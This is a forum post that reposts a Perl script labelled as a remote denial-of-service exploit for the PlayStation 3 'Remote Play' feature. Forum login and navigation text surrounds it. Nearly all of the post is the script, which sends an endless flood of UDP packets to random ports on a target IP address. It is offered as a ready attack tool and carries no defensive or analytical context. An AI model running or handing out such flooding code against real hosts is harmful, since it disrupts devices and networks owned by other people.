MARATHI TEAM
Welcome on the Marathi Team Forum.
To take full advantage of everything offered by
our forum, please log in if you are already a
member or join our community if you're not
yet....


Join the forum, it's quick and easy

MARATHI TEAM
Welcome on the Marathi Team Forum.
To take full advantage of everything offered by
our forum, please log in if you are already a
member or join our community if you're not
yet....
MARATHI TEAM
Would you like to react to this message? Create an account in a few clicks or log in to continue.
Log in

I forgot my password

Latest topics
Top posting users this week
No user

Nimbuzz id Maker
freebuzz is my love :D

user name

password

captcha


Playstation 3 "Remote Play" Remote DoS Exploit

Go down

Heart Playstation 3 "Remote Play" Remote DoS Exploit

Post  storm Thu Sep 12, 2013 10:59 am

Mar 26 2007 05:24AM
mak0b inbox com

#!/usr/bin/perl
####.:Playstation 3 "Remote Play" Remote DoS Exploit:.###
#
# A UDP flood while the "remote play" feature is active
# will result in a denial of service condition.
#
# Tested using PS3 v1.60 (20GB) & PSP v3.10 OE-A
#
# -Dark_K (mak0b[AT]inbox.com)
#
# POC code is based on odix's perl udp flooder
#########################################################

use Socket;

$ARGC=@ARGV;

if ($ARGC !=1) {
printf "usage: ./ps3rpdos.pl \n";
exit(1);
}

socket(crazy, PF_INET, SOCK_DGRAM, 17);
$iaddr = inet_aton("$ARGV[0]");

printf "Sending...\n";

for (;;) {
$size=$rand x $rand x $rand;
$port=int(rand 65000) +1;
send(crazy, 0, $size, sockaddr_in($port, $iaddr));
}
storm
storm
Member
Member

Posts : 155
Points : 458
Reputation : 1
Join date : 2012-12-05

Back to top Go down

Back to top

- Similar topics

 
Permissions in this forum:
You cannot reply to topics in this forum